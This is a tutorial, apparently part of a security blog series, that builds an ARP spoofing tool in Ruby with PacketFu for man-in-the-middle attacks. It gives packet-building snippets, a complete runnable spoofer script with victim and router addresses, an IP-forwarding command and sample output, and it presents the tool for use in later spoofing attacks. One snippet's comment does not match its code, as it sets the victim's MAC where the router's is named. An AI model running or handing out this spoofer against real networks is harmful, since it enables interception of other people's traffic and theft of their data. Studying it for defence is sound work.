ARP Spoofing

As you know, ARP Spoofing attack in the core of MitM attacks. In this part we’ll know how to write simple and effective ARP spoofer tool to use it in later spoofing attacks.

Scenario

We have 3 machines in this scenario as shown below.

  1.              |Attacker|
  2.                  |
  3.                  ٧
  4. |Victim| -----------------> |Router| ---> Internet

Here the list of IP and MAC addresses of each of theme in the following table[^1]

Host/Info IP Address MAC Address
Attacker 192.168.0.100 3C:77:E6:68:66:E9
Victim 192.168.0.21 00:0C:29:38:1D:61
Router 192.168.0.1 00:50:7F:E6:96:20

To know our/attacker’s interface information

  1. info = PacketFu::Utils.whoami?(:iface => "wlan0")

returns a hash

  1. {:iface=>"wlan0",
  2.  :pcapfile=>"/tmp/out.pcap",
  3.  :eth_saddr=>"3c:77:e6:68:66:e9",
  4.  :eth_src=>"<w\xE6hf\xE9",
  5.  :ip_saddr=>"192.168.0.13",
  6.  :ip_src=>3232235533,
  7.  :ip_src_bin=>"\xC0\xA8\x00\r",
  8.  :eth_dst=>"\x00P\x7F\xE6\x96 ",
  9.  :eth_daddr=>"00:50:7f:e6:96:20"}

So you can extract these information like any hash info[:iface], info[:ip_saddr], info[:eth_saddr], etc..

Building victim’s ARP packet

  1. # Build Ethernet header
  2. arp_packet_victim = PacketFu::ARPPacket.new
  3. arp_packet_victim.eth_saddr = "3C:77:E6:68:66:E9"       # our MAC address
  4. arp_packet_victim.eth_daddr = "00:0C:29:38:1D:61"       # the victim's MAC address
  5. # Build ARP Packet
  6. arp_packet_victim.arp_saddr_mac = "3C:77:E6:68:66:E9"   # our MAC address
  7. arp_packet_victim.arp_daddr_mac = "00:0C:29:38:1D:61"   # the victim's MAC address
  8. arp_packet_victim.arp_saddr_ip = "192.168.0.1"          # the router's IP
  9. arp_packet_victim.arp_daddr_ip = "192.168.0.21"         # the victim's IP
  10. arp_packet_victim.arp_opcode = 2                        # arp code 2 == ARP reply

Building router packet

  1. # Build Ethernet header
  2. arp_packet_router = PacketFu::ARPPacket.new
  3. arp_packet_router.eth_saddr = "3C:77:E6:68:66:E9"       # our MAC address
  4. arp_packet_router.eth_daddr = "00:0C:29:38:1D:61"       # the router's MAC address
  5. # Build ARP Packet
  6. arp_packet_router.arp_saddr_mac = "3C:77:E6:68:66:E9"   # our MAC address
  7. arp_packet_router.arp_daddr_mac = "00:50:7F:E6:96:20"   # the router's MAC address
  8. arp_packet_router.arp_saddr_ip = "192.168.0.21"         # the victim's IP
  9. arp_packet_router.arp_daddr_ip = "192.168.0.1"          # the router's IP
  10. arp_packet_router.arp_opcode = 2                        # arp code 2 == ARP reply

Run ARP Spoofing attack

  1. # Send our packet through the wire
  2. while true
  3.     sleep 1
  4.     puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip}"
  5.     arp_packet_victim.to_w(info[:iface])
  6.     puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip}"
  7.     arp_packet_router.to_w(info[:iface])
  8. end

Source[^2]

Wrapping all together and run as root

  1. #!/usr/bin/env ruby
  2. #
  3. # ARP Spoof Basic script
  4. #
  5. require 'packetfu'
  7. attacker_mac = "3C:77:E6:68:66:E9"
  8. victim_ip    = "192.168.0.21"
  9. victim_mac   = "00:0C:29:38:1D:61"
  10. router_ip    = "192.168.0.1"
  11. router_mac   = "00:50:7F:E6:96:20"
  13. info = PacketFu::Utils.whoami?(:iface => "wlan0")
  14. #
  15. # Victim
  16. #
  17. # Build Ethernet header
  18. arp_packet_victim = PacketFu::ARPPacket.new
  19. arp_packet_victim.eth_saddr = attacker_mac        # attacker MAC address
  20. arp_packet_victim.eth_daddr = victim_mac          # the victim's MAC address
  21. # Build ARP Packet
  22. arp_packet_victim.arp_saddr_mac = attacker_mac    # attacker MAC address
  23. arp_packet_victim.arp_daddr_mac = victim_mac      # the victim's MAC address
  24. arp_packet_victim.arp_saddr_ip = router_ip        # the router's IP
  25. arp_packet_victim.arp_daddr_ip = victim_ip        # the victim's IP
  26. arp_packet_victim.arp_opcode = 2                  # arp code 2 == ARP reply
  28. #
  29. # Router
  30. #
  31. # Build Ethernet header
  32. arp_packet_router = PacketFu::ARPPacket.new
  33. arp_packet_router.eth_saddr = attacker_mac        # attacker MAC address
  34. arp_packet_router.eth_daddr = router_mac          # the router's MAC address
  35. # Build ARP Packet
  36. arp_packet_router.arp_saddr_mac = attacker_mac    # attacker MAC address
  37. arp_packet_router.arp_daddr_mac = router_mac      # the router's MAC address
  38. arp_packet_router.arp_saddr_ip = victim_ip        # the victim's IP
  39. arp_packet_router.arp_daddr_ip = router_ip        # the router's IP
  40. arp_packet_router.arp_opcode = 2                  # arp code 2 == ARP reply
  42. while true
  43.     sleep 1
  44.     puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip}"
  45.     arp_packet_victim.to_w(info[:iface])
  46.     puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip}"
  47.     arp_packet_router.to_w(info[:iface])
  48. end

Note: Don’t forget to enable packet forwarding on your system to allow victim to browse internet.

echo "1" > /proc/sys/net/ipv4/ip_forward

Returns, time to wiresharking ;)

  1. [+] Sending ARP packet to victim: 192.168.0.21
  2. [+] Sending ARP packet to router: 192.168.0.1
  3. .
  4. .
  5. .
  6. [+] Sending ARP packet to victim: 192.168.0.21
  7. [+] Sending ARP packet to router: 192.168.0.1
  8. [+] Sending ARP packet to victim: 192.168.0.21
  9. [+] Sending ARP packet to router: 192.168.0.1

[^1]: Create table the easy way - Table Generator

[^2]: Source: DNS Spoofing Using PacketFu